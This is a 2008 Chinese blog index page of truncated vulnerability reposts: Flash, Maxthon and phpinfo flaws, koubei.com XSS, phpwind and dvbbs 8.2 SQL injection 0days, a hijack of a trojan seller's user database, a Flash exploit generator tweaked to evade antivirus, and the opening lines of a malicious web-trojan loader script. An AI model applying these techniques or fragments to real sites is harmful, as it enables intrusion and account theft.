百度首页 | 百度空间
 
文章列表
 
您正在查看 "漏洞|补丁" 分类下的文章

2008-06-24 11:48

作者:zodiacsoft
来源:天鹅糊&&乌鸦酱

[Toooooooooooooooooold]

也就是CVE-2007-0071,flash9x.ocx存在问题,版本一直影响到9.0.115。
漏洞本身很简单,Dowd的思考方向没有脱离大众,但关键在于相当牛逼的一系列利用技巧。具体的细节Dowd写了一篇很棒的paper,估计很多人看了, 也有很多人做了。文章我仔细拜读了一次,但出于某些原因,没有去动手做出最后的成品,以后也不打算做,这个东西不是手把手说怎么触发利用的,而是一些关于 那篇文章的勘误和另一些周边小问题的补充。

第一个

类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-22 11:29

漏洞说明:傲游浏览器是一个强大的多页面浏览器. 除了方便的浏览功能, 傲游浏览器还提供了大量的实用功能改善用户的上网体验,其在中国浏览器市场拥有大量的用户,以安全,界面友好著称。但是80sec安全组织发现遨游在安全处理上存在安全漏洞,导致恶意站点可以修改任意用户配置,读取用户历史访问记录,远程下载文件等种种恶意操作。

漏洞厂商:http://www.maxthon.cn/

漏洞成因:maxthon采用了IE6的内核而不是广泛传说的那样采用IE7内核,而由于遨游对IE6的一些特性并不是十

类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-20 11:14
By:空虚浪子心

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

经验教训,这次拿到了绝对不能公布。

这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

所以会发送用户名密码出去。

监听本地通讯,得到地址:
类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-20 09:54
   ==Ph4nt0m Security Team==

                       Issue 0x02, Phile #0x04 of 0x0A


|=---------------------------------------------------------------------------=|
|=-----------------------=[ 浅析浏览器的跨域安全问题 ]=----------------------=|
|=---------------------------------------------------------------------------=|
|=---------------
类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-17 10:58
来源:Ph4nt0m  

漏洞说明:

php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,许多站点和程序都会将­phpinfo放在自己的站点上或者在程序里显示,但是phpinfo里存在一些安全问题,导致精心构造数据就可以产生一个跨站脚本漏洞,可以被用来进行攻击。

漏洞成因:

phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以
类别:漏洞|补丁 | 评论(1) | 浏览()
 
2008-06-03 21:18

作者:余弦
来源:0×37 Security

口碑网www.koubei.com,很火的一个WEB2.0信息共享网站。口碑确实不错,不过安全性就不是这样了。刚刚发现的两个XSS Trap,可以轻易爆发XSS WORM。口碑网的XSS Trap肯定不止这两个,其它的就没渗透的必要了:)

XSS Trap ONE:

博客的发表文章处,这个编辑器我估计是漏洞不少,虽然在客户端过滤的不错,但是使用Firefox的Tamper Data插件就轻易绕过。发文章时,Tamper Data截获的

类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-02 09:59

作者:open
来源:open’s Blog

首先说下。偶么有看其它的版本。我只对我中招后所提出来的版本为例。
其它版本我一无所知。
看留言有位仁兄提出时间问题。是的。这个版本却实有个时间验证问题。
不过改一个字节足可以跳过它的验证。
还有偶对SWF格式或FLASH完全不熟。
我从来不当它是一个SWF来反编译来。
下面是我改过的生成器。去掉时间验证,同时把SHELLCODE向后推了两个字节。卡巴应该不会再叫。

其实杀软不清楚,对分析ODAY这东西。却实超出偶能力范围

类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-06-01 13:57

漏洞发布:http://www.80sec.com/
漏洞作者:jianxin@80sec.com
漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害:高
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.com有提供exploit

类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-05-30 16:06
by where(hackerb@126.com)

漏洞描述:

中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。


漏洞等级:

高危

漏洞分析:
password=123123&codestr=71&Cooki
类别:漏洞|补丁 | 评论(0) | 浏览()
 
2008-05-27 10:23
来源:Neeao Blog
最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expire
类别:漏洞|补丁 | 评论(0) | 浏览()
 
     
 
 
文章分类
 
     
 
文章存档
 
 
 
 
 
 
 
 
 
 
 
     
 
最新文章评论
   

N久不来....没想到竟然是 这个结果 哎
 

....勇气
 

去一个陌生的地方逛逛吧,是能放松身心的
 

希望在城市的一角还能有坚守着寂寞,仅此共勉.
 
 
     


©2008 Baidu